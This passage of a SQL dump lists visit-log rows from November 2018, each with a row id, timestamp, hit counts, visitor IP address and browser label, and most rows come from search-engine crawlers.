337668,1542786712,1,1,0,0,'54.36.148.97','other'),(337669,1542786768,1,1,0,0,'154.16.138.18','other'),(337670,1542786884,1,1,0,0,'54.36.149.80','other'),(337671,1542787007,1,1,0,0,'46.229.168.132','other'),(337672,1542787012,1,1,0,0,'46.229.168.145','other'),(337673,1542787036,1,1,0,0,'54.36.148.232','other'),(337674,1542787166,1,1,0,0,'8.29.198.26','other'),(337675,1542787288,1,1,0,0,'54.36.149.54','other'),(337676,1542787608,1,1,0,0,'54.36.149.107','other'),(337677,1542787710,1,1,0,0,'54.36.148.86','other'),(337678,1542787981,1,1,0,0,'66.249.66.156','chrome'),(337679,1542788001,1,1,0,0,'66.249.66.61','chrome'),(337680,1542788002,1,1,0,0,'66.249.66.40','chrome'),(337681,1542788099,1,1,0,0,'54.36.148.59','other'),(337682,1542788632,1,1,0,0,'40.77.167.54','other'),(337683,1542788844,1,1,0,0,'8.29.198.27','other'),(337684,1542788880,1,1,0,0,'95.163.255.99','other'),(337685,1542788883,1,1,0,0,'95.163.255.97','other'),(337686,1542789244,1,1,0,0,'54.36.148.183','other'),(337687,1542789272,1,1,0,0,'157.55.39.252','other'),(337688,1542789423,1,1,0,0,'54.36.149.2','other'),(337689,1542789464,1,1,0,0,'8.29.198.26','other'),(337690,1542789533,1,1,0,0,'54.36.148.44','other'),(337691,1542789619,1,1,0,0,'54.36.148.151','other'),(337692,1542789701,1,1,0,0,'54.36.148.168','other'),(337693,1542789870,1,1,0,0,'54.36.148.82','other'),(337694,1542789971,1,1,0,0,'54.36.149.70','other'),(337695,1542790178,1,1,0,0,'54.36.148.206','other'),(337696,1542790601,2,2,0,0,'91.242.199.126','chrome'),(337697,1542790655,1,1,0,0,'54.36.149.33','other'),(337698,1542790792,2,2,0,0,'178.95.246.220','chrome'),(337699,1542790848,1,1,0,0,'66.249.66.156','chrome'),(337700,1542791362,3,3,0,0,'91.196.178.69','chrome'),(337701,1542791377,1,1,0,0,'66.249.66.154','chrome'),(337702,1542791431,12,12,0,0,'178.154.244.29','other'),(337703,1542791493,1,1,0,0,'157.55.39.252','other'),(337704,1542791531,1,1,0,0,'40.77.167.85','other'),(337705,1542791595,1,1,0,0,'54.36.148.209','other'),(337706,1542791609,1,1,0,0,'46.229.168.136','other'),(337707,1542791611,1,1,0,0,'46.229.168.139','other'),(337708,1542791702,5,5,0,0,'178.154.244.11','other'),(337709,1542791749,1,1,0,0,'54.36.148.167','other'),(337710,1542791757,1,1,0,0,'40.77.167.54','other'),(337711,1542791794,1,1,0,0,'66.249.66.61','chrome'),(337712,1542791795,1,1,0,0,'66.249.66.40','chrome'),(337713,1542791902,1,1,0,0,'54.36.148.101','other'),(337714,1542791957,1,1,0,0,'54.36.149.94','other'),(337715,1542792145,2,2,0,0,'5.45.207.19','other'),(337716,1542792273,2,2,0,0,'5.45.207.79','other'),(337717,1542792306,2,2,0,0,'34.219.183.84','chrome'),(337718,1542792357,13,13,0,0,'178.154.244.29','other'),(337719,1542792409,4,4,0,0,'91.196.178.104','chrome'),(337720,1542792419,1,1,0,0,'54.36.148.218','other'),(337721,1542792430,1,1,0,0,'178.219.88.225','firefox'),(337722,1542792449,1,1,0,0,'87.250.224.47','other'),(337723,1542792466,1,1,0,0,'77.222.153.236','chrome'),(337724,1542792510,1,1,0,0,'157.55.39.252','other'),(337725,1542792598,1,1,0,0,'54.36.148.123','other'),(337726,1542792604,1,1,0,0,'54.36.148.50','other'),(337727,1542792621,7,7,0,0,'178.154.244.11','other'),(337728,1542792636,1,1,0,0,'54.36.148.232','other'),(337729,1542792860,1,1,0,0,'54.36.148.189','other'),(337730,1542792891,1,1,0,0,'5.58.64.186','firefox'),(337731,1542792917,1,1,0,0,'54.36.149.1','other'),(337732,1542793056,1,1,0,0,'5.45.207.19','other'),(337733,1542793194,2,2,0,0,'5.45.207.79','other'),(337734,1542793385,2,2,0,0,'162.210.196.98','other'),(337735,1542793391,1,1,0,0,'66.249.66.155','chrome'),(337736,1542793414,1,1,0,0,'54.36.148.165','other'),(337737,1542793452,1,1,0,0,'46.229.168.129','other'),(337738,1542793454,1,1,0,0,'46.229.168.147','other'),(337739,1542793456,4,4,0,0,'178.154.244.29','other'),(337740,1542793855,1,1,0,0,'178.154.244.11','other'),(337741,1542793860,1,1,0,0,'141.8.142.191','other'),(337742,1542793923,1,1,0,0,'91.196.178.104','chrome'),(337743,1542793992,1,1,0,0,'54.36.148.232','other'),(337744,1542794112,1,1,0,0,'54.36.148.39','other'),(337745,1542794323,2,2,0,0,'52.53.201.78','chrome'),(337746,1542794419,1,1,0,0,'54.36.148.40','other'),(337747,1542794595,1,1,0,0,'54.36.148.170','other'),(337748,1542794645,1,1,0,0,'54.36.148.131','other'),(337749,1542794795,2,2,0,0,'91.196.178.172','chrome'),(337750,1542794937,1,1,0,0,'46.229.168.154','other'),(337751,1542795092,1,1,0,0,'54.36.148.239','other'),(337752,1542795114,1,1,0,0,'54.36.149.106','other'),(337753,1542795222,1,1,0,0,'95.163.255.62','other'),(337754,1542795225,1,1,0,0,'95.163.255.64','other'),(337755,1542795478,1,1,0,0,'178.95.246.220','chrome'),(337756,1542796404,1,1,0,0,'54.36.148.139','other'),(337757,1542796677,1,1,0,0,'54.36.148.159','other'),(337758,1542796711,1,1,0,0,'157.55.39.252','other'),(337759,1542797052,1,1,0,0,'66.249.66.152','chrome'),(337760,1542797229,1,1,0,0,'66.249.66.61','chrome'),(337761,1542797230,1,1,0,0,'66.249.66.40','chrome'),(337762,1542797499,1,1,0,0,'54.36.148.53','other'),(337763,1542797581,1,1,0,0,'66.249.66.154','chrome'),(337764,1542797796,1,1,0,0,'54.36.148.119','other'),(337765,1542797816,1,1,0,0,'178.154.244.11','other'),(337766,1542798003,1,1,0,0,'8.29.198.25','other'),(337767,1542798121,4,4,0,0,'37.53.228.75','chrome'),(337768,1542798215,2,2,0,0,'91.196.178.93','chrome'),(337769,1542798291,1,1,0,0,'54.36.148.222','other'),(337770,1542798453,1,1,0,0,'54.36.149.88','other'),(337771,1542798789,2,2,0,0,'95.134.202.123','chrome'),(337772,1542798889,1,1,0,0,'54.36.148.147','other'),(337773,1542799159,1,1,0,0,'54.36.148.80','other'),(337774,1542799220,1,1,0,0,'54.36.149.75','other'),(337776,1542799408,1,1,0,0,'54.36.148.38','other'),(337777,1542799678,1,1,0,0,'8.29.198.26','other'),(337778,1542799791,1,1,0,0,'54.36.149.74','other'),(337779,1542800319,1,1,0,0,'8.29.198.27','other'),(337780,1542800690,1,1,0,0,'40.77.167.54','other'),(337781,1542801345,1,1,0,0,'54.36.149.63','other'),(337782,1542802239,1,1,0,0,'54.36.148.238','other'),(337783,1542802305,1,1,0,0,'54.36.148.251','other'),(337784,1542802443,1,1,0,0,'207.46.13.172','other'),(337785,1542802557,1,1,0,0,'54.36.148.123','other'),(337786,1542802661,1,1,0,0,'95.163.255.99','other'),(337787,1542802671,1,1,0,0,'95.163.255.94','other'),(337788,1542802717,1,1,0,0,'66.249.66.157','chrome'),(337790,1542802793,2,2,0,0,'91.196.177.46','firefox'),(337791,1542803314,1,1,0,0,'54.36.148.235','other'),(337792,1542803327,2,2,0,0,'91.196.178.93','chrome'),(337793,1542803401,1,1,0,0,'193.0.218.65','chrome'),(337794,1542803424,1,1,0,0,'54.36.148.129','other'),(337795,1542803476,1,1,0,0,'37.53.233.248','chrome'),(337796,1542803583,1,1,0,0,'54.36.149.34','other'),(337797,1542803654,1,1,0,0,'54.36.148.101','other'),(337798,1542803890,1,1,0,0,'46.229.168.150','other'),(337799,1542804149,1,1,0,0,'54.36.148.197','other'),(337800,1542804328,1,1,0,0,'54.36.149.11','other'),(337801,1542804350,1,1,0,0,'40.77.167.54','other'),(337802,1542804459,1,1,0,0,'54.36.149.0','other'),(337803,1542804471,1,1,0,0,'54.36.149.86','other'),(337804,1542804607,1,1,0,0,'54.36.149.85','other'),(337805,1542804994,1,1,0,0,'54.36.148.97','other'),(337806,1542805361,1,1,0,0,'54.36.148.191','other'),(337807,1542805440,1,1,0,0,'46.229.168.138','other'),(337808,1542805661,1,1,0,0,'54.36.148.195','other'),(337809,1542805875,1,1,0,0,'91.196.177.46','firefox'),(337810,1542805922,2,2,0,0,'91.196.178.135','firefox'),(337811,1542806108,1,1,0,0,'54.36.149.24','other'),(337812,1542806138,1,1,0,0,'54.36.149.8','other'),(337813,1542806173,1,1,0,0,'54.36.148.180','other'),(337814,1542806303,1,1,0,0,'54.36.149.71','other'),(337815,1542806799,1,1,0,0,'46.229.168.143','other'),(337816,1542806806,2,2,0,0,'178.154.244.29','other'),(337817,1542806807,1,1,0,0,'95.108.213.4','other'),(337818,1542806808,1,1,0,0,'178.154.244.11','other'),(337819,1542806832,3,3,0,0,'91.196.177.46','firefox'),(337820,1542807066,1,1,0,0,'54.36.148.220','other'),(337821,1542807253,1,1,0,0,'54.36.149.79','other'),(337822,1542807364,1,1,0,0,'54.36.148.131','other'),(337823,1542807368,1,1,0,0,'54.208.102.37','other'),(337824,1542807371,1,1,0,0,'107.21.1.8','other'),(337825,1542807433,1,1,0,0,'54.36.148.11','other'),(337826,1542807564,1,1,0,0,'54.36.149.90','other'),(337827,1542807593,20,20,0,0,'128.199.42.170','other'),(337828,1542807868,1,1,0,0,'54.36.148.221','other'),(337829,1542807923,1,1,0,0,'54.36.148.78','other'),(337830,1542808189,1,1,0,0,'157.55.39.252','other'),(337831,1542808558,1,1,0,0,'54.36.149.78','other'),(337832,1542808623,1,1,0,0,'54.36.149.51','other'),(337833,1542808840,1,1,0,0,'8.29.198.25','other'),(337834,1542808848,1,1,0,0,'54.36.148.210','other'),(337835,1542808938,1,1,0,0,'54.36.148.56','other'),(337836,1542809122,1,1,0,0,'54.36.149.87','other'),(337837,1542809156,1,1,0,0,'91.196.177.46','firefox'),(337838,1542809649,1,1,0,0,'178.154.244.11','other'),(337842,1542809667,1,1,0,0,'54.36.148.240','other'),(337843,1542809822,2,2,0,0,'40.77.167.54','other'),(337844,1542809988,1,1,0,0,'54.36.149.29','other'),(337845,1542810385,1,1,0,0,'54.36.148.212','other'),(337846,1542810519,2,2,0,0,'8.29.198.27','other'),(337847,1542810561,1,1,0,0,'91.196.177.46','firefox'),(337848,1542810586,3,3,0,0,'178.154.244.29','other'),(337849,1542810659,1,1,0,0,'157.55.39.252','other'),(337850,1542810777,1,1,0,0,'46.229.168.129','other'),(337851,1542810826,1,1,0,0,'54.36.148.27','other'),(337852,1542810890,3,3,0,0,'178.154.244.11','other'),(337853,1542811074,1,1,0,0,'5.45.207.79','other'),(337854,1542811181,1,1,0,0,'54.36.148.138','other'),(337855,1542811201,1,1,0,0,'37.53.230.254','firefox'),(337856,1542811300,1,1,0,0,'54.36.148.224','other'),(337857,1542811419,1,1,0,0,'5.45.207.19','other'),(337858,1542811670,1,1,0,0,'54.36.148.68','other'),(337859,1542811714,1,1,0,0,'94.23.58.212','other'),(337860,1542812026,1,1,0,0,'91.196.177.46','firefox'),(337861,1542812176,1,1,0,0,'178.95.246.220','chrome'),(337862,1542812191,2,2,0,0,'91.196.178.132','firefox'),(337863,1542812294,1,1,0,0,'54.36.148.90','other'),(337864,1542812441,1,1,0,0,'54.36.148.144','other'),(337865,1542812534,1,1,0,0,'54.36.149.25','other'),(337866,1542812626,2,2,0,0,'91.196.178.174','chrome'),(337867,1542812719,1,1,0,0,'54.36.149.79','other'),(337868,1542812741,1,1,0,0,'54.36.148.70','other'),(337869,1542813028,1,1,0,0,'66.249.64.15','chrome'),(337870,1542813110,1,1,0,0,'66.249.64.14','chrome'),(337871,1542813183,1,1,0,0,'54.36.149.72','other'),(337872,1542813206,2,2,0,0,'91.196.178.69','firefox'),(337873,1542813430,1,1,0,0,'46.229.168.134','other'),(337874,1542813432,1,1,0,0,'46.229.168.137','other'),(337875,1542813564,1,1,0,0,'54.36.148.63','other'),(337876,1542813756,1,1,0,0,'54.36.148.227','other'),(337877,1542813943,1,1,0,0,'54.36.148.45','other'),(337878,1542813965,2,2,0,0,'178.154.244.29','other'),(337879,1542814007,1,1,0,0,'46.229.168.139','other'),(337880,1542814008,1,1,0,0,'46.229.168.154','other'),(337881,1542814229,1,1,0,0,'54.36.148.116','other'),(337882,1542814589,1,1,0,0,'54.36.148.222','other'),(337883,1542815029,1,1,0,0,'46.229.168.146','other'),(337884,1542815051,1,1,0,0,'54.36.149.66','other'),(337885,1542815247,1,1,0,0,'46.229.168.134','other'),(337886,1542815370,1,1,0,0,'54.36.149.99','other'),(337887,1542815394,1,1,0,0,'54.36.148.54','other'),(337888,1542815430,1,1,0,0,'54.36.149.103','other'),(337889,1542815623,1,1,0,0,'54.36.149.20','other'),(337890,1542815732,1,1,0,0,'46.229.168.132','other'),(337891,1542815735,1,1,0,0,'46.229.168.135','other'),(337892,1542815821,1,1,0,0,'54.36.149.25','other'),(337893,1542816019,1,1,0,0,'54.36.148.24','other'),(337894,1542816264,1,1,0,0,'5.255.177.4','chrome'),(337895,1542816577,1,1,0,0,'66.249.64.16','chrome'),(337896,1542816748,1,1,0,0,'54.36.148.224','other'),(337897,1542816793,1,1,0,0,'54.36.148.194','other'),(337898,1542816832,1,1,0,0,'54.36.148.236','other'),(337899,1542816860,1,1,0,0,'54.36.148.189','other'),(337900,1542816910,1,1,0,0,'46.229.168.133','other'),(337901,1542817078,1,1,0,0,'157.55.39.252','other'),(337902,1542817225,1,1,0,0,'91.196.178.38','chrome'),(337903,1542817283,1,1,0,0,'54.36.148.180','other'),(337904,1542817409,1,1,0,0,'54.36.148.225','other'),(337905,1542817527,1,1,0,0,'54.36.148.130','other'),(337906,1542817608,1,1,0,0,'5.45.207.79','other'),(337907,1542817686,1,1,0,0,'54.36.149.29','other'),(337908,1542817704,1,1,0,0,'54.36.149.72','other'),(337909,1542818026,1,1,0,0,'54.36.148.22','other'),(337910,1542818753,1,1,0,0,'40.77.167.85','other'),(337911,1542818757,1,1,0,0,'54.36.149.17','other'),(337912,1542819180,1,1,0,0,'93.78.184.53','firefox'),(337913,1542819193,2,2,0,0,'54.36.148.62','other'),(337914,1542819194,1,1,0,0,'54.36.148.156','other'),(337915,1542819305,1,1,0,0,'54.36.148.123','other'),(337916,1542819530,1,1,0,0,'209.90.225.44','chrome'),(337917,1542819703,1,1,0,0,'8.29.198.25','other'),(337918,1542819852,1,1,0,0,'46.229.168.138','other'),(337919,1542819854,1,1,0,0,'46.229.168.132','other'),(337920,1542819858,1,1,0,0,'93.78.184.53','other'),(337921,1542820030,1,1,0,0,'54.36.148.160','other'),(337922,1542820301,1,1,0,0,'40.77.167.162','other'),(337923,1542820849,1,1,0,0,'46.229.168.141','other'),(337924,1542820852,1,1,0,0,'46.229.168.153','other'),(337925,1542820961,1,1,0,0,'54.36.148.185','other'),(337926,1542821045,1,1,0,0,'54.36.148.158','other'),(337927,1542821046,1,1,0,0,'54.36.149.98','other'),(337928,1542821053,1,1,0,0,'46.211.52.210','other'),(337929,1542821151,1,1,0,0,'93.78.184.169','msie'),(337930,1542821289,1,1,0,0,'77.123.185.100','chrome'),(337931,1542821297,1,1,0,0,'46.229.168.152','other'),(337932,1542821364,2,2,0,0,'8.29.198.26','other'),(337933,1542821434,1,1,0,0,'66.249.64.29','chrome'),(337934,1542821438,2,2,0,0,'66.249.64.14','chrome'),(337935,1542821440,1,1,0,0,'54.36.149.53','other'),(337936,1542821724,1,1,0,0,'54.36.148.79','other'),(337937,1542821804,1,1,0,0,'46.229.168.129','other'),(337938,1542821906,1,1,0,0,'54.36.149.71','other'),(337939,1542822111,1,1,0,0,'40.77.167.104','other'),(337940,1542822231,1,1,0,0,'54.36.149.16','other'),(337941,1542822245,1,1,0,0,'54.36.148.245','other'),(337942,1542822471,1,1,0,0,'54.36.148.73','other'),(337943,1542822648,1,1,0,0,'46.229.168.144','other'),(337944,1542822651,1,1,0,0,'46.229.168.148','other'),(337945,1542823029,1,1,0,0,'54.36.148.13','other'),(337946,1542823070,1,1,0,0,'54.36.148.118','other'),(337947,1542823148,1,1,0,0,'66.249.64.15','chrome'),(337948,1542823216,1,1,0,0,'46.229.168.143','other'),(337949,1542823218,1,1,0,0,'46.229.168.150','other'),(337950,1542823279,1,1,0,0,'54.36.149.92','other'),(337951,1542823310,1,1,0,0,'66.249.70.8','chrome'),(337952,1542823720,1,1,0,0,'178.212.111.36','chrome'),(337953,1542823751,1,1,0,0,'40.77.167.104','other'),(337954,1542823908,1,1,0,0,'194.44.104.193','firefox'),(337955,1542824008,1,1,0,0,'40.77.167.85','other'),(337956,1542824428,1,1,0,0,'66.249.64.14','chrome'),(337957,1542824459,1,1,0,0,'40.77.167.162','other'),(337958,1542824565,1,1,0,0,'54.36.148.97','other'),(337959,1542824573,1,1,0,0,'54.36.149.49','other'),(337960,1542824919,1,1,0,0,'54.36.148.208','other'),(337961,1542825445,1,1,0,0,'66.249.64.15','chrome'),(337962,1542825600,1,1,0,0,'54.36.148.141','other'),(337963,1542825723,1,1,0,0,'40.77.167.85','other'),(337964,1542825934,1,1,0,0,'40.77.167.162','other'),(337965,1542825987,1,1,0,0,'54.36.148.241','other'),(337966,1542826292,1,1,0,0,'46.229.168.144','other'),(337967,1542826363,2,2,0,0,'157.55.39.252','other'),(337968,1542826656,1,1,0,0,'54.36.148.120','other'),(337969,1542826740,1,1,0,0,'54.36.149.19','other'),(337970,1542826803,1,1,0,0,'54.36.148.145','other'),(337971,1542827021,1,1,0,0,'54.36.148.76','other'),(337972,1542827159,1,1,0,0,'54.36.148.82','other'),(337973,1542827392,1,1,0,0,'66.249.64.30','chrome'),(337974,1542827394,1,1,0,0,'66.249.64.14','chrome'),(337975,1542827570,2,2,0,0,'46.211.27.24','chrome'),(337976,1542827746,1,1,0,0,'130.180.219.193','msie'),(337977,1542827850,1,1,0,0,'54.36.149.89','other'),(337978,1542827988,1,1,0,0,'54.36.148.42','other'),(337979,1542828191,1,1,0,0,'46.211.111.228','chrome'),(337980,1542828267,1,1,0,0,'95.163.255.92','other'),(337981,1542828271,1,1,0,0,'54.36.148.67','other'),(337982,1542828294,1,1,0,0,'95.163.255.154','other'),(337983,1542828296,1,1,0,0,'95.163.255.159','other'),(337984,1542828596,1,1,0,0,'46.229.168.135','other'),(337985,1542828718,1,1,0,0,'54.36.148.70','other'),(337986,1542828971,1,1,0,0,'54.36.149.6','other'),(337987,1542829053,2,2,0,0,'130.180.219.193','opera'),(337988,1542829105,1,1,0,0,'54.36.148.73','other'),(337989,1542829279,1,1,0,0,'40.77.167.85','other'),(337990,1542829289,1,1,0,0,'66.249.64.15','chrome'),(337991,1542829290,1,1,0,0,'66.249.64.21','chrome'),(337992,1542829427,1,1,0,0,'176.31.123.200','other'),(337993,1542829466,1,1,0,0,'46.229.168.152','other'),(337994,1542829737,1,1,0,0,'54.36.148.184','other'),(337995,1542830097,1,1,0,0,'54.36.148.251','other'),(337996,1542830216,1,1,0,0,'54.36.149.58','other'),(337997,1542830380,1,1,0,0,'54.36.149.73','other'),(337998,1542830547,1,1,0,0,'8.29.198.25','other'),(337999,1542830637,1,1,0,0,'13.57.233.99','chrome'),(338000,1542830677,1,1,0,0,'54.36.148.128','other'),(338001,1542830681,1,1,0,0,'54.36.149.47','other'),(338002,1542831108,1,1,0,0,'54.36.149.52','other'),(338003,1542831153,1,1,0,0,'54.36.149.43','other'),(338004,1542831201,96,96,0,0,'5.9.70.72','other'),(338005,1542831371,1,1,0,0,'40.77.167.104','other'),(338006,1542831671,1,1,0,0,'54.36.148.49','other'),(338007,1542831748,1,1,0,0,'54.36.149.69','other'),(338008,1542831832,1,1,0,0,'66.249.70.27','chrome'),(338010,1542831904,1,1,0,0,'54.36.148.185','other'),(338011,1542832206,1,1,0,0,'8.29.198.26','other'),(338012,1542832280,2,2,0,0,'66.249.64.22','chrome'),(338013,1542832489,7,7,0,0,'178.154.244.11','other'),(338014,1542832494,1,1,0,0,'66.249.64.20','chrome'),(338015,1542832531,1,1,0,0,'54.36.149.70','other'),(338016,1542832581,1,1,0,0,'54.36.149.90','other'),(338017,1542832609,1,1,0,0,'66.249.64.16','chrome'),(338018,1542832647,9,9,0,0,'178.154.244.29','other'),(338019,1542832680,2,2,0,0,'5.45.207.79','other'),(338020,1542832867,1,1,0,0,'8.29.198.27','other'),(338021,1542832945,1,1,0,0,'5.45.207.19','other'),(338022,1542833393,1,1,0,0,'141.8.142.144','other'),(338023,1542833395,7,7,0,0,'178.154.244.11','other'),(338024,1542833412,1,1,0,0,'5.45.207.8','other'),(338025,1542833519,1,1,0,0,'157.55.39.252','other'),(338026,1542833605,1,1,0,0,'54.36.149.21','other'),(338027,1542833633,7,7,0,0,'178.154.244.29','other'),(338028,1542833686,1,1,0,0,'95.163.255.176','other'),(338029,1542833690,1,1,0,0,'95.163.255.170','other'),(338030,1542833847,1,1,0,0,'54.36.149.103','other'),(338031,1542833879,46,46,0,0,'176.31.101.111','other'),(338032,1542833974,2,2,0,0,'40.77.167.104','other'),(338033,1542833977,2,2,0,0,'87.250.224.47','other'),(338034,1542833980,1,1,0,0,'141.8.142.103','other'),(338035,1542833981,1,1,0,0,'37.9.113.148','other'),(338036,1542834066,1,1,0,0,'46.229.168.141','other'),(338037,1542834069,1,1,0,0,'46.229.168.144','other'),(338038,1542834079,1,1,0,0,'13.66.139.0','other'),(338039,1542834232,1,1,0,0,'66.249.70.8','chrome'),(338040,1542834253,1,1,0,0,'66.249.64.16','chrome'),(338041,1542834305,1,1,0,0,'5.45.207.19','other'),(338042,1542834416,5,5,0,0,'178.154.244.11','other'),(338043,1542834427,2,2,0,0,'54.36.148.200','other'),(338044,1542834544,5,5,0,0,'178.154.244.29','other'),(338045,1542834830,1,1,0,0,'87.250.224.65','other'),(338046,1542834832,1,1,0,0,'95.163.255.95','other'),(338047,1542834837,1,1,0,0,'95.163.255.99','other'),(338048,1542835068,1,1,0,0,'54.36.149.98','other'),(338049,1542835087,1,1,0,0,'54.36.148.149','other'),(338050,1542835179,2,2,0,0,'157.55.39.252','other'),(338051,1542835196,1,1,0,0,'54.36.148.81','other'),(338052,1542835418,1,1,0,0,'40.77.167.162','other'),(338053,1542835717,1,1,0,0,'54.36.148.229','other'),(338054,1542835731,1,1,0,0,'46.211.41.140','chrome'),(338055,1542835944,1,1,0,0,'178.154.244.11','other'),(338056,1542836193,1,1,0,0,'46.229.168.145','other'),(338057,1542836199,1,1,0,0,'46.229.168.144','other'),(338058,1542836367,2,2,0,0,'31.148.135.243','firefox'),(338059,1542836571,1,1,0,0,'95.163.255.174','other'),(338060,1542836573,1,1,0,0,'95.163.255.167','other'),(338061,1542836576,1,1,0,0,'95.163.255.183','other'),(338062,1542836578,1,1,0,0,'95.163.255.159','other'),(338063,1542836857,1,1,0,0,'66.249.64.30','chrome'),(338064,1542836858,1,1,0,0,'66.249.64.15','chrome'),(338065,1542836866,1,1,0,0,'54.36.148.54','other'),(338066,1542837467,1,1,0,0,'66.249.64.14','chrome'),(338067,1542837672,1,1,0,0,'40.77.167.162','other'),(338068,1542837849,1,1,0,0,'54.36.149.1','other'),(338069,1542838061,1,1,0,0,'54.36.148.212','other'),(338070,1542838136,1,1,0,0,'95.163.255.192','other'),(338071,1542838143,1,1,0,0,'95.163.255.176','other'),(338072,1542838379,1,1,0,0,'54.36.149.61','other'),(338073,1542838654,1,1,0,0,'91.222.155.180','firefox'),(338074,1542838670,1,1,0,0,'54.36.148.106','other'),(338075,1542838811,1,1,0,0,'46.149.186.29','chrome'),(338076,1542838976,1,1,0,0,'95.163.255.189','other'),(338077,1542838979,2,2,0,0,'95.163.255.153','other'),(338078,1542839055,1,1,0,0,'54.36.149.10','other'),(338079,1542839096,1,1,0,0,'54.36.148.121','other'),(338080,1542839125,1,1,0,0,'178.154.244.11','other'),(338081,1542839165,1,1,0,0,'54.36.148.146','other'),(338082,1542839444,1,1,0,0,'95.163.255.182','other'),(338083,1542839447,2,2,0,0,'95.163.255.194','other'),(338084,1542839481,1,1,0,0,'54.36.148.223','other'),(338085,1542839571,1,1,0,0,'95.163.255.168','other'),(338086,1542839584,1,1,0,0,'54.36.149.13','other'),(338087,1542839837,1,1,0,0,'95.163.255.183','other'),(338088,1542839856,1,1,0,0,'95.163.255.92','other'),(338089,1542839867,1,1,0,0,'95.163.255.98','other'),(338090,1542840047,1,1,0,0,'54.36.149.76','other'),(338091,1542840326,1,1,0,0,'54.36.148.158','other'),(338092,1542840775,1,1,0,0,'54.36.148.116','other'),(338093,1542840810,1,1,0,0,'40.77.167.104','other'),(338094,1542840831,1,1,0,0,'54.36.149.29','other'),(338095,1542840859,1,1,0,0,'54.36.148.41','other'),(338096,1542840997,1,1,0,0,'54.36.148.46','other'),(338097,1542841033,1,1,0,0,'178.154.244.11','other'),(338098,1542841035,1,1,0,0,'66.249.64.16','chrome'),(338099,1542841247,1,1,0,0,'54.36.148.20','other'),(338100,1542841346,2,2,0,0,'77.121.135.136','firefox'),(338101,1542841396,1,1,0,0,'8.29.198.25','other'),(338102,1542841693,1,1,0,0,'54.36.148.28','other'),(338103,1542841814,1,1,0,0,'54.36.148.126','other'),(338104,1542841867,1,1,0,0,'54.36.148.118','other'),(338105,1542842230,2,2,0,0,'5.45.207.79','other'),(338107,1542842231,1,1,0,0,'178.154.244.29','other'),(338108,1542842336,1,1,0,0,'54.36.149.53','other'),(338109,1542842409,1,1,0,0,'54.36.148.234','other'),(338110,1542842410,1,1,0,0,'54.36.149.100','other'),(338111,1542842494,1,1,0,0,'66.249.70.29','chrome'),(338112,1542842495,1,1,0,0,'66.249.70.8','chrome'),(338113,1542842555,1,1,0,0,'66.249.64.30','chrome'),(338114,1542842576,1,1,0,0,'54.36.149.39','other'),(338115,1542842589,1,1,0,0,'66.249.64.16','chrome'),(338116,1542843005,1,1,0,0,'46.229.168.141','other'),(338117,1542843007,1,1,0,0,'46.229.168.152','other'),(338118,1542843046,2,2,0,0,'8.29.198.25','other'),(338119,1542843054,1,1,0,0,'54.36.148.215','other'),(338120,1542843154,2,2,0,0,'54.36.149.55','other'),(338121,1542843254,1,1,0,0,'54.36.148.224','other'),(338122,1542843518,1,1,0,0,'54.36.149.102','other'),(338123,1542843657,1,1,0,0,'95.163.255.160','other'),(338124,1542843660,1,1,0,0,'95.163.255.197','other'),(338125,1542843748,1,1,0,0,'66.249.64.15','chrome'),(338126,1542843769,1,1,0,0,'40.77.167.162','other'),(338127,1542843846,1,1,0,0,'54.36.148.78','other'),(338128,1542844002,1,1,0,0,'54.36.148.76','other'),(338129,1542844059,1,1,0,0,'54.36.148.124','other'),(338130,1542844082,1,1,0,0,'54.36.148.112','other'),(338131,1542844942,1,1,0,0,'54.36.148.38','other'),(338132,1542845014,2,2,0,0,'66.249.64.16','chrome'),(338133,1542845018,1,1,0,0,'54.36.149.77','other'),(338134,1542845049,1,1,0,0,'66.249.70.10','chrome'),(338135,1542845084,1,1,0,0,'40.77.167.162','other'),(338136,1542845164,1,1,0,0,'66.249.64.14','chrome'),(338137,1542845314,1,1,0,0,'54.36.148.208','other'),(338138,1542845384,1,1,0,0,'46.229.168.135','other'),(338139,1542845385,1,1,0,0,'46.229.168.154','other'),(338140,1542845888,1,1,0,0,'54.36.148.146','other'),(338141,1542846132,1,1,0,0,'157.55.39.252','other'),(338142,1542846558,1,1,0,0,'54.36.149.107','other'),(338143,1542846776,1,1,0,0,'54.36.149.38','other'),(338144,1542846858,1,1,0,0,'66.249.64.15','chrome'),(338145,1542846943,1,1,0,0,'54.36.148.225','other'),(338146,1542846994,1,1,0,0,'54.36.148.85','other'),(338147,1542847061,1,1,0,0,'54.36.149.10','other'),(338148,1542847389,1,1,0,0,'46.229.168.135','other'),(338149,1542847780,1,1,0,0,'54.36.148.22','other'),(338150,1542847872,1,1,0,0,'66.249.64.28','chrome'),(338151,1542847873,1,1,0,0,'66.249.64.14','chrome'),(338152,1542847952,1,1,0,0,'54.36.148.143','other'),(338153,1542848133,1,1,0,0,'54.36.149.34','other'),(338154,1542848410,1,1,0,0,'54.36.148.241','other'),(338155,1542848846,1,1,0,0,'54.36.149.10','other'),(338156,1542848959,1,1,0,0,'66.249.64.30','chrome'),(338158,1542849117,2,1,1,0,'66.249.64.28',''),(338159,1542849120,1,1,0,0,'66.249.64.15','chrome'),(338160,1542849144,1,1,0,0,'95.163.255.169','other'),(338161,1542849147,1,1,0,0,'95.163.255.159','other'),(338162,1542849150,1,1,0,0,'54.36.149.62','other'),(338163,1542849309,1,1,0,0,'54.36.148.193','other'),(338164,1542849874,1,1,0,0,'54.36.148.58','other'),(338165,1542850106,1,0,1,0,'66.249.64.15',''),(338166,1542850190,1,1,0,0,'54.36.148.73','other'),(338167,1542850207,1,1,0,0,'66.249.64.30','chrome'),(338168,1542850248,1,1,0,0,'66.249.64.14','chrome'),(338169,1542850271,1,1,0,0,'180.76.15.147','other'),(338170,1542850274,1,1,0,0,'180.76.15.23','other'),(338171,1542850469,1,1,0,0,'54.36.149.84','other'),(338172,1542850535,1,1,0,0,'54.36.148.163','other'),(338173,1542850921,1,1,0,0,'54.36.148.54','other'),(338174,1542851044,1,1,0,0,'66.249.64.29','chrome'),(338175,1542851045,1,1,0,0,'66.249.64.16','chrome'),(338176,1542851582,1,0,1,0,'66.249.70.27',''),(338177,1542851583,1,0,1,0,'66.249.70.10',''),(338178,1542851728,1,1,0,0,'54.36.148.252','other'),(338179,1542851783,1,1,0,0,'66.249.64.14','chrome'),(338180,1542851869,1,1,0,0,'54.36.149.82','other'),(338181,1542851925,1,1,0,0,'54.36.148.197','other'),(338182,1542852023,2,2,0,0,'91.209.11.236','other'),(338183,1542852255,1,1,0,0,'8.29.198.25','other'),(338184,1542852271,1,1,0,0,'180.76.15.142','other'),(338185,1542852272,1,1,0,0,'180.76.15.16','other'),(338186,1542852383,3,3,0